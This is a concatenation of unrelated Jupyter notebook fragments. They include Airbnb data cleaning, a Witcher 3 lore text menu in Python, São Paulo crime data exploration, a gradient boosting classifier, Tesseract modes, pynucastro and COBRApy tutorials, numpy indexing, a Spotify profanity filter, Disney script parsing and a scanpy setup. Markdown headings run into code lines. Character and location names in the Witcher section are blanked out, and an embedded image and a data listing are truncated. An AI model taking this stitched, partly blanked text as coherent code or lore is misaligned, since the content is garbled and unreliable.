df.extra_people = df.extra_people.str.replace(",", "") df.extra_people.fillna(0, inplace=True) df.extra_people = df.extra_people.astype('int64')First Reviewdf.first_review = pd.to_datetime(df.first_review) # Converting to datetime # Calculating the number of days between the first review and the date the data was scraped df['time_since_first_review'] = (datetime.now() - df.first_review).astype('timedelta64[D]') df[df['first_review'].isnull()==True][['time_since_first_review']].shape def bin_column(col, bins, labels, na_label='unknown'): """ Takes in a column name, bin cut points and labels, replaces the original column with a binned version, and replaces nulls (with 'unknown' if unspecified). """ df[col] = pd.cut(df[col], bins=bins, labels=labels, include_lowest=True) df[col] = df[col].astype('str') df[col].fillna(na_label, inplace=True) # Binning time since first review bin_column('time_since_first_review', bins=[0, 182, 365, 730, 1460, max(df.time_since_first_review)], labels=['0-6 months', '6-12 months', '1-2 years', '2-3 years', '4+ years'], na_label='no reviews') # Distribution of the number of days since first review df.time_since_first_review.hist(figsize=(15,5), bins=30, color=(.3, .84, .77), edgecolor='k'); df.drop('first_review', axis=1, inplace=True) df.drop(['time_since_first_review'], axis=1, inplace=True)Last Reviewdf.last_review = pd.to_datetime(df.last_review) # Converting to datetime # Calculating the number of days between the most recent review and the date the data was scraped df['time_since_last_review'] = (datetime.now() - df.last_review).astype('timedelta64[D]') # Distribution of the number of days since last review df.time_since_last_review.hist(figsize=(15,5), bins=30,color=(.3, .84, .77),edgecolor='k'); # Binning time since last review bin_column('time_since_last_review', bins=[0, 14, 60, 182, 365, max(df.time_since_last_review)], labels=['0-2 weeks', '2-8 weeks', '2-6 months', '6-12 months', '1+ year'], na_label='no reviews') # Distribution of the number of days since first review df.time_since_last_review.hist(figsize=(15,5), bins=30, color=(.3, .84, .77),edgecolor='k'); # Dropping last_review - first_review will be kept for EDA and dropped later df.drop('last_review', axis=1, inplace=True) df.drop(['time_since_last_review'], axis=1, inplace=True)Review Ratings# Checking the distributions of the review ratings columns variables_to_plot = list(df.columns[df.columns.str.startswith("review_scores") == True]) fig = plt.figure(figsize=(12,8)) for i, var_name in enumerate(variables_to_plot): ax = fig.add_subplot(3,3,i+1) df[var_name].hist(bins=10,ax=ax,color=(.3, .84, .77)) ax.set_title(var_name) fig.tight_layout() plt.show() # Creating a list of all review columns that are scored out of 10 variables_to_plot.pop(0) # Binning for all columns scored out of 10 for col in variables_to_plot: bin_column(col, bins=[0, 8, 9, 10], labels=['0-8/10', '9/10', '10/10'], na_label='no reviews') # Binning column scored out of 100 bin_column('review_scores_rating', bins=[0, 80, 95, 100], labels=['0-79/100', '80-94/100', '95-100/100'], na_label='no reviews')Cancelation Policydf.cancellation_policy.value_counts() # Replacing categories df.cancellation_policy.replace({ 'super_strict_30': 'strict_14_with_grace_period', 'super_strict_60': 'strict_14_with_grace_period', 'strict': 'strict_14_with_grace_period', 'luxury_moderate': 'moderate' }, inplace=True) df.drop(['number_of_reviews_ltm'], axis=1, inplace=True) df.drop('host_since', axis=1, inplace=True) # df.drop('amenities', axis=1, inplace=True) df.host_is_superhost.value_counts() df.info(verbose=True,null_counts=True, ) df.fillna(0, inplace=True) df.rename(columns={'neighbourhood_cleansed':'borough'},inplace=True) df.info(verbose=True,null_counts=True, ) df.to_csv('/content/drive/My Drive/data/processed_data/processed.csv') df_dummies=pd.get_dummies(df) # df_dummies.to_csv('/content/drive/My Drive/data/processed_data/london_dummy.csv') df_dummies.info(verbose=True, null_counts=True) Int64Index: 84798 entries, 11551 to 39869282 Data columns (total 117 columns): host_is_superhost 84798 non-null float64 host_listings_count 84798 non-null float64 host_identity_verified 84798 non-null float64 latitude 84798 non-null float64 longitude 84798 non-null float64 accommodates 84798 non-null int64 bathrooms 84798 non-null float64 bedrooms 84798 non-null float64 beds 84798 non-null float64 price 84798 non-null int64 security_deposit 84798 non-null int64 cleaning_fee 84798 non-null int64 gue[...]Profile Final Data Set!pip install pandas-profiling[notebook,html] from pandas_profiling import ProfileReport profile = ProfileReport(df_dummies) profile.to_file('/content/drive/My Drive/data/london-pp.html')Interactive Menu with Python - Witcher 3 Lore Author: 1st Data Science Roadmap challenge of the "Trilhas" program offered by "Inova Mararanhão" and the State government of Maranhão, Brazil ![133845-games-review-the-witcher-3-wild-hunt-review-image1-07yik9ul5s.jpg](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8SEhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEUHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAARCAJ2BGADAREAAhEBAxEB/8QAHAAAAQUBAQEAAAAAAAAAAAAABAECAwUGAAcI/8QAShAAAgECBQIEBAQDBgUEAAILAQIDBBEABRIhMRNBBiJRYRQycYEHI5GhFUKxUmLB0eHwJDNygvEIFkOSJVOyJjRzohc1VGN00v/EABsBAAMBAQEBAQAAAAAAAAAAAAABAgMEBQYH/8QAPREAAgIBAwIDBwQCAwACAQEJAAECEQMSITEEQVFh8BMicYGRobEywdHhBfEUI0IzUgYkYhVDcoKSssLS/9oADAMBAAIRAxEAPwD2Fy2OE9cb5sAjvNhgxtzgEdqOAYmo4Asa18NCI2Y4Yhm+AQgucA0cQcACKrE4AHi+AZIqk4VgO6R4wWA/peT6YAGWIwhUcBY3wwJ4I2kbbA3Q//) Game Story Functiondef game_story(): print(''' The Witcher 3 Game Story Please Select a menu item below [0] - Back [1] - Game Story ''') option = int(input("Enter option: ")) if option == 1: print(''' The world is in chaos. The air is thick with tension and the smoke of burnt villages. The fearsome Empire of Nilfgaard has struck again, ravaging the helpless Northern Kingdoms. The once mighty who tried to use Geralt for their own gain are now gone. In these uncertain times, no one can say what fortune holds in store, who will bring peace to the world and who will cause it only misery. But a force darker and deadlier emerges. The petty men and women commanding tin-plated armies fail to understand that their conflict is child's play compared to the Wild Hunt, the otherworldly threat which now looms. These ghastly spectral riders have for ages plagued humankind, bringing misery to the world. This time the Wild Hunt seeks one person in particular: the one individual Destiny itself bestowed upon Geralt, the one soul Geralt considers kin. ''') print("-~"*80) elif option == 0: return else: print('Invalid option. Try again.')Locations Functiondef locations(): print(''' The Witcher 3 Locations Please Select a Location in the list [0] - Back [1] - [2] - Skellige [3] - Novigrad ''') option = int(input("Enter option: ")) if option == 1: print(''' (corruption of Elder Speech: Caer a'Muirehen, meaning Keep of the Elder Sea) is an old keep where witchers of the School of the Wolf used to be trained. It is located in the mountains of Hertch the kingdom of Kaedwen, right off the Gwenllech river. The castle can only be reached by "The Witchers Trail", nicknamed "The Killer", which is easy to miss and encircles the keep. While Trials and Changes are no longer performed here, witchers still tend to rest here between their assignments—usually during the winter, after which they set out on The Path again. The keep's name is a nod to an ancient sea in the area, indicated by the presence of fossilized sea creatures embedded in the stones on which it was built. ''') print("-~"*80) elif option == 2: print(''' Skellige, commonly referred to as the Skellige Isles or the Isles of Skellige, is an archipelago and one of the Northern Kingdoms. The group of six islands is situated in the Great Sea, off the coast of Cintra and southwest of Cidaris and Verden. It's legendary, famous for the unrivaled corsairs and swift longships that sail many seas. Its people are united under the King of the Skellige Isles, who's elected by the jarls of the seven major clans during traditional moots. In practice, however, the kings are from the same clan or at least related. Even though their relations with most of the North were always tense, to say the least, they were longtime allies of Cintra, due to the marriage between Queen Calanthe and Eist Tuirseach of Skellige. After King Eist's death in the Battle of Marnadal, the Islanders concentrated their raids on the Nilfgaardian Empire in an act of revenge. ''') elif option == 3: print(''' Novigrad is a free city within Redania and is therefore not subject to the rule of that kingdom. It is one of the major ports on the continent and populated by nearly 30,000 inhabitants, making it one of the largest cities in the North. Like any true metropolis, Novigrad has many factories and is home to all manner of craftsmen offering every ware possible and one can even find the occasional con-man or shady dealer. The city is also home to numerous banks and even has a zoo. The Eternal Fire is said to protect the city's inhabitants from all evil, monsters included. The thick city walls have never been breached, as they were tactfully designed by the architects of the Oxenfurt Academy. Novigrad is inhabited by an unusually colorful group of both permanent residents and those in town on long and short-term visits. Most eye-catching amidst the throngs of common townsfolk, stall-keepers, and craftsmen are those practicing the more roguish professions. There is no army in the city but it does have a secret service, an ever-present Temple Guard, and a powerful Temple Fleet. ''') elif option == 0: return else: print('Invalid option. Try again.')Characters Functiondef characters(): print(''' The Witcher 3 Main Characters Please Select a Character in the list [0] - Back [1] - [2] - Ciri [3] - ''') option = int(input("Enter option: ")) if option == 1: print(''' was a legendary witcher of the School of the Wolf active throughout the 13th century. He loved the sorceress Yennefer, considered the love of his life despite their tumultuous relationship, and became Ciri's adoptive father. During the Trial of the Grasses, Geralt exhibited unusual tolerance for the mutagens that grant witchers their abilities. Accordingly, Geralt was subjected to further experimental mutagens which rendered his hair white and may have given him greater speed, strength, and stamina than his fellow witchers. Despite his title, Geralt did not hail from the city of Rivia. After being left with the witchers by his mother, Visenna, he grew up in their keep of Kaer Morhen in the realm of Kaedwen. In the interest of appearing more trustworthy to potential clients, young witchers were encouraged to make up surnames for themselves by master Vesemir. As his first choice, Geralt chose "", but this choice was dismissed by Vesemir as silly and pretentious, so "Geralt" was all that remained of his chosen name. "" was a more practical alternative and Geralt even went so far as to adopt a Rivian accent to appear more authentic. Later, Queen Meve of Lyria knighted him for his valor in the Battle for the Bridge on the Yaruga conferring on him the formal title "of Rivia", which amused him.[1] He, therefore, became a true knight. ''') print("-~"*80) elif option == 2: print(''' (better known as Ciri), was born in 1252 or 1253,[4] and most likely during the Belleteyn holiday.[5] She was the sole princess of Cintra, the daughter of Pavetta and (who was using the alias "Duny" at the time) as well as Queen Calanthe's granddaughter. After Geralt of Rivia helped lift Duny's curse, Duny asked what reward the witcher would like and Geralt evoked the Law of Surprise, as it turned out Pavetta was pregnant with Ciri, unbeknownst to Duny. ''') elif option == 3: print(''' , born on Belleteyn in 1173, was a sorceress who lived in Vengerberg, the capital city of Aedirn. She was Geralt of Rivia's true love and a mother figure to Ciri, whom she viewed like a daughter to the point that she did everything she could to rescue the girl and keep her from harm. She helped advise King Demavend of Aedirn (though was never a formal royal advisor), a close friend of , and the youngest member of the Council of Wizards within the Brotherhood of Sorcerers. After its fall, the Lodge of Sorceresses attempted to recruit her, but they didn't see eye to eye as the Lodge wanted to advance their own political agenda by using Ciri. ''') elif option == 0: return else: print('Invalid option. Try again.')Monsters Functiondef monsters(): print(''' The Witcher 3 Monsters Please Select a Monster in the list [0] - Back [1] - Werewolf [2] - Djinn [3] - Doppler [4] - Bruxa ''') option = int(input("Enter option: ")) if option == 1: print(''' Werewolves are therianthropes who transform into wolves or half-wolves. As other such creatures, they are hardly hurt by steel but very vulnerable to silver. There are two most common ways to aquire lycanthropy: the first one through a curse[2] and the second is to simply have a werewolf parent. Being bitten by another werewolf, while popular in folk tales, gives only a very small chance of becoming one in reality[2], though it is still recommended to get magical treatment.[4] Those who are born as werewolves are able to fully control their shapeshifting abilities, while those cursed or bitten change into their werewolf form only during the full moon.[2] Those who became werewolves during their lives however are the only ones who can be cured.[3] The wolfsbane is said to mitigate the illness' symptoms. Therianthropy diseases, including lycanthropy, appeared in the world after the Conjunction of the Spheres, affecting nonhuman and early human populations alike.[2] According to Herbolth, lands in the Toina valley, also called the Dogbane, were plagued by werewolves before the Nordling colonization.[5] Werewolves have a legendary sense of smell, exceptional even amongst real wolves.[1] Lycanthropes are usually on good terms with other canines and, as one would expect, hate werecats.[2] ''') print("-~"*80) elif option == 2: print(''' Djinn, D'jinni or Djinniah[1] is the name given to an elemental genie of Air. In the short story, "The Last Wish", the first Witcher short story collection by , Dandelion released a Djinn which wreaked havoc in Rinde. It is in the same story that we learn of , a mage, who had captured numerous djinns and harnessed their powers for his own gain. Much the same as in fairy tales, Djinns are powerful creatures that are capable of great feats. Once captured, they are then bound to the captor and have to fulfill three wishes. Following their completion, they are free once more. ''') elif option == 3: print(''' Dopplers (also called shifters, mimics, doubles, imitators, or pavrats) are shapeshifters who can take the form of anyone or any beast they have encountered, provided it has a similar body weight. They used to live in the plateau near modern-day Novigrad but moved to the city itself after it proved to offer more possibilities of survival. ''') elif option == 4: print(''' Bruxa is a very powerful type of vampire that takes on the appearance of a dark-haired, young human, most often woman, but whose natural form is that of a large, black bat with sharp fangs and claws. It is one of few vampire species not affected by sun, the others being alps, mulas[1] and Higher Vampires.[2] Bruxae are very agile and only silver swords are effective against them. While they have sharp claws for close up attacks, they can also let out a piercing scream from further away that can send even a grown man flying through the air. Only Quen being able to counter this, although the power of the cry can even break through it in certain situations. The bruxae are in the habit of singing in their native language, especially after they drank blood, and their songs are described as silent, shrill, and sickening. Thanks to these, bruxae can manipulate and bend to their will any human by altering their dreams and turning them into horrible nightmares. ''') elif option == 0: return else: print('Invalid option. Try again.')Main Menu Functiondef main_menu(): print(''' The Witcher 3 Lore Please Select an Info in the Main Menu [0] - Exit [1] - Game Story [2] - Locations [3] - Characters [4] - Monsters ''') option = int(input('Enter option: ')) while True: if option == 0: print("Thank you! See you again next time!") return if option == 1: game_story() elif option == 2: locations() elif option == 3: characters() elif option == 4: monsters() else: print("Invalid option, please try again.") print(''' The Witcher 3 Lore Please Select an Info in the Main Menu [0] - Exit [1] - Game Story [2] - Locations [3] - Characters [4] - Monsters ''') option = int(input('Enter option: '))Calling the main menumain_menu()Análise dos Crimes no Estado de São Paulo Abaixo faço a Análise inicial do boletim de ocorrência dos últimos 10 anos do estado de São Paulo * Verificação de informação das colunas;* Verificação da qualidade dos Dados;* Primeiros insights;import pandas as pd import pandas as pd df = pd.read_csv('https://query.data.world/s/4suwdpbioxf7phmxtauxqsq0k', encoding = 'latin1') df.head() #Verificando tipo dados das colunas df.info() #Sera que temos boletins inclusive desse ano ? df['ANO_BO'].max() #Verificando variáveis que podem conter tipos de crimes df['RUBRICA'].head() #Excelente, vamos quer quantos tipos de crimes diferentes temos aqui registrados : df['RUBRICA'].nunique() #E agora vamos ver quais são df['RUBRICA'].unique()Sempre tive interesse em investigar todos os crimes diretamente ligados ao tráfico de drogas. Acima posso ver quais são esses.artigo_12 = df[df['RUBRICA']== 'Tráfico de entorpecente (Art. 12)'] artigo_12.head() #Vendo as características do novo dataframe artigo_12.info() artigo_12['DESDOBRAMENTO'].nunique() artigo_12 artigo_12['ANO_BO'].max()Gradient Boosting Classifier (GBC)#Importing necessary libraries import numpy as np import pandas as pd import pickle from sklearn.model_selection import train_test_split from sklearn.preprocessing import StandardScaler from sklearn.decomposition import PCA from sklearn.pipeline import Pipeline from sklearn.pipeline import make_pipeline from sklearn.ensemble import GradientBoostingClassifier from sklearn.metrics import classification_report, confusion_matrix, accuracy_score import matplotlib.pyplot as plt import seaborn as sns #Taking the EDA data with open('../EDA/EDA.pickle', 'rb') as data: df = pickle.load(data) #Initial values of dataset df.head() #Shape of dataset df.shape #Lable mapping label_mapping = {'NEGATIVE': 0, 'NEUTRAL': 1, 'POSITIVE': 2} #Function for creating train test split def preprocess_inputs(df): df = df.copy() df['label'] = df['label'].replace(label_mapping) y = df['label'].copy() X = df.drop('label', axis=1).copy() X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.7, random_state=123) return X_train, X_test, y_train, y_test X_train, X_test, y_train, y_test = preprocess_inputs(df) print('Shape of Training Dataset:',X_train.shape) print('Shape of Testing Dataset:',X_test.shape) #Creating Pipeline for Random Forrest Classifer Classifier Algorithm pipeline_gbc = make_pipeline(GradientBoostingClassifier()) %%time #Fitting the model best_model=pipeline_gbc.fit(X_train, y_train) #Prediction gbc_pred = best_model.predict(X_test) # Training accuracy print("The training set accuracy is: {} ".format(accuracy_score(y_train, best_model.predict(X_train)))) # Test accuracy print("The test set accuracy is: {} %".format(accuracy_score(y_test, best_model.predict(X_test)))) # Classification report print("Classification report") print(classification_report(y_test,gbc_pred)) #Plotting the confusion matrix conf_matrix = confusion_matrix(y_test, gbc_pred) plt.figure(figsize=(12.8,6)) sns.heatmap(conf_matrix, annot=True, cmap="Blues") plt.ylabel('Predicted') plt.xlabel('Actual') plt.title('Confusion matrix') plt.savefig("../Images/ConfusionMatrix_GBC.png") #Creating dictionary for storing the accuracy details d = { 'Model': 'Gradient Boosting Classifier', 'Training Set Accuracy': accuracy_score(y_train, best_model.predict(X_train)), 'Test Set Accuracy': accuracy_score(y_test, best_model.predict(X_test)) } #Creating Data Frame df_models_gbc = pd.DataFrame(d, index=[0]) df_models_gbc #Creating pickle files for further use with open('../Models/best_gbc.pickle', 'wb') as output: pickle.dump(best_model, output) with open('../Models/df_models_gbc.pickle', 'wb') as output: pickle.dump(df_models_gbc, output)Page segmentation modes: - 0 Orientation and script detection (OSD) only. - 1 Automatic page segmentation with OSD. - 2 Automatic page segmentation, but no OSD, or OCR. - 3 Fully automatic page segmentation, but no OSD. (Default) - 4 Assume a single column of text of variable sizes. - 5 Assume a single uniform block of vertically aligned text. - 6 Assume a single uniform block of text. - 7 Treat the image as a single text line. - 8 Treat the image as a single word. - 9 Treat the image as a single word in a circle. - 10 Treat the image as a single character. - 11 Sparse text. Find as much text as possible in no particular order. - 12 Sparse text with OSD. - 13 Raw line. Treat the image as a single text line, bypassing hacks that are Tesseract-specific.pytesseract.image_to_string(img_cv, lang='eng', config='-psm 1')Specifying Desired Nuclei to Construct a Network The `Library` class in `pynucastro` provides a high level interface for reading files containing one or more Reaclib rates and then filtering these rates based on user-specified criteria for the nuclei involved in the reactions. We can then use the resulting rates to build a network.This example uses a Reaclib snapshot downloaded from:https://groups.nscl.msu.edu/jina/reaclib/db/library.php?action=viewsnapshots. Reading a rate snapshotThe `Library` class will look for the library file in the working directory or in the `pynucastro/library` subdirectory of the `pynucastro` package.When the constructor is supplied a file name, `pynucastro` will read the contents of this file and interpret them as Reaclib rates in either the Reaclib 1 or 2 formats. The `Library` then stores the rates from the file as `Rate` objects.%matplotlib inline import pynucastro as pyna library_file = '20180201ReaclibV2.22' mylibrary = pyna.rates.Library(library_file)Specifying Desired NucleiThis example constructs a CNO network like the one constructed from a set of Reaclib rate files in the "pynucastro usage examples" section of this documentation.This time, however, we will specify the nuclei we want in the network and allow the `Library` class to find all the rates linking only nuclei in the set we specified.We can specify these nuclei by their abbreviations in the form, e.g. "he4":all_nuclei = ["p", "he4", "c12", "n13", "c13", "o14", "n14", "o15", "n15"]Now we use the `Library.linking_nuclei()` function to return a smaller `Library` object containing only the rates that link these nuclei.We can pass `with_reverse=False` to restrict `linking_nuclei` to only include forward rates from the Reaclib library, as pynucastro does not yet implement partition functions for reverse rates.cno_library = mylibrary.linking_nuclei(all_nuclei, with_reverse=False)Now we can create a network (`PythonNetwork`, `BaseFortranNetwork`, or `StarKillerNetwork`) as:cno_network = pyna.networks.PythonNetwork(libraries=cno_library)In the above, we construct a network from a `Library` object by passing the `Library` object to the `libraries` argument of the network constructor. To construct a network from multiple libraries, the `libraries` argument can also take a list of `Library` objects.We can show the structure of the network by plotting a network diagram.cno_network.plot()Note that the above network also includes the triple-alpha rate from Reaclib. If we wanted to generate the python code to calculate the right-hand side we could next do:cno_network.write_network('network_module.py')Using the pipeline together with COBRApy functions to studying auxotrophyIn this tutorial the pipeline will suggest the reactions to knock-in to allow _E. coli_ auxotrophic for Tryptophan to grow on methane and produce Arginine. It is already known that *E. coli* can't grow on methane thus reactions should be added to give the model this functionality. So the approach is to:1. make the model iML1515 auxotrophic for Tryptophan2. add the Trp back to the medium to restore growth3. on these conditions run the analysis for growth on methane and production of Arginine 1) Make the model auxotrophic for TrpFor this some previous research is needed:- It is important to find out which genes are usually knocked-out to make a stain of *E. coli* auxotrophic for Trp- Then the correspondant reaction(s) that is catalyzed by the enzyme encoded by the gene(s) have to be identified. For this the [BiGG database](http://bigg.ucsd.edu/) is of help. Typing the gene in there allow you to find the reactions that are associated to it.For instance in the following example, it was known that trpC is the gene that is commonly knocked-out to make *E. coli* auxotrophic for Trp, therefore trpc was typed in the BiGG search bar and the first lines of the results are the followingThe model that is being used (i.e iML1515) is not included in the result, however, the reaction accociated to trpC in iML1515 can be found by following the link of the gene. In this case the first solution was clicked and the following is the information on gene reaction association:Then clicking in one of the two reactions you could find on the right the list of the models in which it is found (see the red arro in the picture below).- Once the reaction(s) correspondant to the gene KO is identified, those should be removed from the model which should not grow in a normal medium compositionfrom pipeline_package import import_models, input_parser, analysis import cobra data_repo = "../inputs" model_aux = import_models.get_reference_model(data_repo, '../inputs/ecoli_ch4_arg.csv') universal = import_models.get_universal_main(data_repo, '../inputs/ecoli_ch4_arg.csv') trpC = model_aux.reactions.IGPS trpC growth_wt = model_aux.optimize() growth_wt.objective_value growth_wt.fluxes['IGPS'] for i in model_aux.reactions: if i.flux <= -0.5 and "EX_" in i.id: print(i.id, i.reaction, i.flux) for i in model_aux.reactions: if i.flux >= 0.5 and "EX_" in i.id: print(i.id, i.reaction, i.flux) model_aux.remove_reactions([trpC]) growth_ko = model_aux.optimize() growth_ko.objective_valueConsiderations- Eliminating the reactions associated to trpC causes no growth on the wild type carbon source (glucose)- Adding the amino acid, Trp in this case, to the medium should restore growth 2) Adding Trp to the medium to restore growthtrpgex = model_aux.reactions.EX_trp__L_e trpgex.bounds trpgex.lower_bound = -0.05 #inverse of the flux through the reacion KO in the wt model growth_ms = model_aux.optimize() growth_ms.objective_value3) Using the function of the pipeline to find out which reactions should be added*E. coli* can't grow on methane, and the strain auxotrophic for Trp can't grow on it either. Therefore GapFilling is needed to find out possible reaction addition.input_parser.parser('../inputs/ecoli_ch4_arg.csv', universal, model_aux) consumption = analysis.analysis_gf_sol('../inputs/ecoli_ch4_arg.csv', model_aux, universal) consumption production = analysis.dict_prod_sol('../inputs/ecoli_ch4_arg.csv', consumption, model_aux, universal) production final = analysis.cons_prod_dict('../inputs/ecoli_ch4_arg.csv', model_aux, universal, consumption, production) finalConcluding considerationsThis approach mixes some individual research of the candidate reactions to remove from the model to generate the auxotrophic strain before using the functions of the pipeline to find out if the auxotrophic model can grow on a particular substrate and produce a target. In principle both reaction addition and reaction removal for growth coupled production should be found, however, the module of the pipeline using Optknock has very long running times, thus the followin analysis is uncompletedfrom pipeline_package import call_Optknock ko_results = call_Optknock.full_knock_out_analysis('../inputs/ecoli_ch4_arg.csv', consumptionr, final, model_aux, universal) ko_resultsarr_copyarr_copy # INDEXING ON 2D ARRAY arr_2d = np.array([[5, 10, 15], [20, 25, 30], [40, 45, 50]]) arr_2d arr_2d.shape arr_2d[1] arr_2d[1][1] arr_2d[2][2] arr_2d[:2] arr_2d[:2][1:] arr_2d[:2,1:] # CONDITIONAL SELECTION arr = np.arange(1, 11)arrarr arr > 4 bool_arr = arr > 4 bool_arr arr[bool_arr] arr[arr > 4] arr[arr == 2] arr[arr <= 6]Convert to Title Casedef convert_to_title_case(s): return s.title() clean_name_album_artists_df['name'] = clean_name_album_artists_df['name'].apply(convert_to_title_case) clean_name_album_artists_df['album'] = clean_name_album_artists_df['album'].apply(convert_to_title_case) clean_name_album_artists_df['artists'] = clean_name_album_artists_df['artists'].apply(convert_to_title_case) clean_name_album_artists_df.head(1)Check Profanitypip install better_profanity from better_profanity import profanity def check_profanity(s): return not profanity.contains_profanity(s) profanity_name_mask = clean_name_album_artists_df['name'].apply(check_profanity) final_cleaned_df = clean_name_album_artists_df[profanity_name_mask] len(final_cleaned_df) final_cleaned_df.head(3) from sklearn.utils import shuffle final_cleaned_df = shuffle(final_cleaned_df) final_cleaned_df.head(3) final_cleaned_df.to_csv('spotify_songs_dataset.csv', index=False)import clean_txt as cltxtimport numpy as np import matplotlib.pyplot as plt import pandas as pd import osimport clean_txt as cltxt import numpy as np import matplotlib.pyplot as plt import pandas as pd import osRescuer down still has scene setup to be fixedfp = os.path.join('..\scripts', 'the_rescuers_down_under.txt') rescuer = cltxt.clean_txt(fp,['[',']']) rescuer['line_stemmed'] = rescuer['lines'].apply(cltxt.clean_lines) rescuer['scene_setup_stemmed'] = rescuer['scene_setup'].apply(cltxt.clean_lines) # out_path = os.path.join('..\cleaned_scripts', 'aladdin.csv') # rescuer.to_csv(out_path) rescuer fp = os.path.join('..\scripts', 'aladdin.txt') aladdin = cltxt.clean_txt(fp,['(',')']) aladdin['line_stemmed'] = aladdin['lines'].apply(cltxt.clean_lines) aladdin['scene_setup_stemmed'] = aladdin['scene_setup'].apply(cltxt.clean_lines) out_path = os.path.join('..\cleaned_scripts', 'aladdin.csv') aladdin.to_csv(out_path) aladdin.head() fp = os.path.join('..\scripts', 'the_hunchback_of_notre_dame.txt') hunchback = cltxt.clean_txt(fp,['(',')']) hunchback['line_stemmed'] = hunchback['lines'].apply(cltxt.clean_lines) hunchback['scene_setup_stemmed'] = hunchback['scene_setup'].apply(cltxt.clean_lines) out_path = os.path.join('..\cleaned_scripts', 'the_hunchback_of_notre_dame.csv') hunchback.to_csv(out_path) hunchback fp = os.path.join('..\scripts', 'beauty_and_the_beast.txt') bb = cltxt.clean_txt(fp,['(',')']) bb['line_stemmed'] = bb['lines'].apply(cltxt.clean_lines) bb['scene_setup_stemmed'] = bb['scene_setup'].apply(cltxt.clean_lines) out_path = os.path.join('..\cleaned_scripts', 'beauty_and_the_beast.csv') bb.to_csv(out_path) bb fp = os.path.join('..\scripts', 'aladdin.txt') # os.listdir('scripts') chars = [] words = [] scene_setup = [] scene = False new_char = True def get_scene_setup(string): ''' get scence setup ''' s = string scene_setup = s[s.find("("):s.find(")")+1] return scene_setup def remove_scene_setup(string): ''' get scence setup ''' s = string scene_setup = s[s.find("("):s.find(")")+1] s = string.replace(scene_setup, ' ') return s line_nums = [] with open(fp, 'r', encoding='utf-8') as infile: for num_l, line in enumerate(infile): num_l += 1 s = line if not new_char: if ':' in line and ' ' not in line: pass else: words[-1] += line if ':' in line: if ' ' in line: words[-1] += line continue line_nums += [num_l] words += [line.split(':')[1]] chars += [line.split(':')[0]] new_char = False df = pd.DataFrame() chars_words = np.array(list(zip(chars, words,line_nums))) draft = pd.DataFrame(chars_words,columns = ['chars','lines','line_num']) # 2) put lines into a df & store it # 3) draft['scene_setup'] = draft.lines.apply(get_scene_setup) draft['mod_lines'] = draft.lines.apply(remove_scene_setup) draft fp = os.path.join('..\scripts', 'beauty_and_the_beast.txt') # os.listdir('scripts') chars = [] words = [] scene_setup = [] scene = False new_char = True line_nums = [] with open(fp, 'r', encoding='utf-8') as infile: for num_l, line in enumerate(infile): num_l += 1 s = line if not new_char: if ':' in line and ' ' not in line: pass else: words[-1] += line if ':' in line: if ' ' in line: words[-1] += line continue line_nums += [num_l] words += [line.split(':')[1]] chars += [line.split(':')[0]] new_char = False df = pd.DataFrame() chars_words = np.array(list(zip(chars, words,line_nums))) draft = pd.DataFrame(chars_words,columns = ['chars','lines','line_num']) # 2) put lines into a df & store it # 3) draft['scene_setup'] = draft.lines.apply( cltxt.get_scene_setup,args= (['(',')']) ) draft['mod_lines'] = draft.lines.apply(cltxt.remove_scene_setup, args = (['(',')'])) draft['new'] = draft['mod_lines'].apply(cltxt.clean_lines) draft['new_cl'] = draft['scene_setup'].apply(cltxt.clean_lines) draft fp = os.path.join('..\scripts', 'the_hunchback_of_notre_dame.txt') # os.listdir('scripts') chars = [] words = [] scene_setup = [] scene = False new_char = True def get_scene_setup(string): ''' get scence setup ''' s = string scene_setup = s[s.find("("):s.find(")")+1] return scene_setup def remove_scene_setup(string): ''' get scence setup ''' s = string scene_setup = s[s.find("("):s.find(")")+1] s = string.replace(scene_setup, ' ') return s line_nums = [] with open(fp, 'r', encoding='utf-8') as infile: for num_l, line in enumerate(infile): num_l += 1 # print(line) s = line # get scene setup if not new_char: if ':' in line and ' ' not in line: pass else: words[-1] += line if ':' in line: # The problem with this is that its only applied for # scripts with in-line lines with characters if ' ' in line: words[-1] += line continue line_nums += [num_l] words += [line.split(':')[1]] chars += [line.split(':')[0]] new_char = False df = pd.DataFrame() # np.array(chars).shape # np.array(words).shape chars_words = np.array(list(zip(chars, words,line_nums))) draft = pd.DataFrame(chars_words,columns = ['chars','lines','line_num']) # 2) put lines into a df & store it # 3) draft['scene_setup'] = draft.lines.apply(get_scene_setup) draft['mod_lines'] = draft.lines.apply(remove_scene_setup) draft fp = os.path.join('..\scripts', 'the_rescuers_down_under.txt') chars = [] words = [] scene_setup = [] scene = False new_char = True def get_scene_setup(string): ''' get scence setup ''' s = string scene_setup = s[s.find("["):s.find("]")+1] return scene_setup def remove_scene_setup(string): ''' get scence setup ''' s = string scene_setup = s[s.find("["):s.find("]")+1] s = string.replace(scene_setup, ' ') return s line_nums = [] with open(fp, 'r', encoding='utf-8') as infile: # print(infile.readlines()) for num_l, line in enumerate(infile): num_l += 1 # print(line) s = line # get scene setup if not new_char: if ':' in line and ' ' not in line: pass else: words[-1] += line if ':' in line: if ' ' in line: words[-1] += line continue line_nums += [num_l] words += [line.split(':')[1]] chars += [line.split(':')[0]] new_char = False df = pd.DataFrame() # np.array(chars).shape # np.array(words).shape chars_words = np.array(list(zip(chars, words,line_nums))) draft = pd.DataFrame(chars_words,columns = ['chars','lines','line_num']) # 2) put lines into a df & store it # 3) draft['scene_setup'] = draft.lines.apply(get_scene_setup) draft['mod_lines'] = draft.lines.apply(remove_scene_setup) draftPixel analysis part 4 Open filtered AnnData, run clustering and do differential expression analysis Set paths Input`data_dir`: general root dir for storing data, including downloaded Metaspace datasets and plots `normalized_dataset_path`: path to the dataset, which was filtered and normalized as the first steps of single-cell analysis Output`plots_path`: directory for plots (ion images, cell masks, plots from scanpy analysis)data_dir = Path(r"/Users/alberto-mac/EMBL_ATeam/projects/gastrosome") proj_dir = "Drug_W8_new_alyona" plots_path = data_dir / proj_dir/ "plots" plots_path.mkdir(parents=True, exist_ok=True) sc.settings.figdir = plots_path plt.rcParams['savefig.facecolor']='white' normalized_dataset_path = data_dir / proj_dir / "normalized_dataset.h5ad" # normalized_dataset_path = data_dir / "single_cell_analysis" / 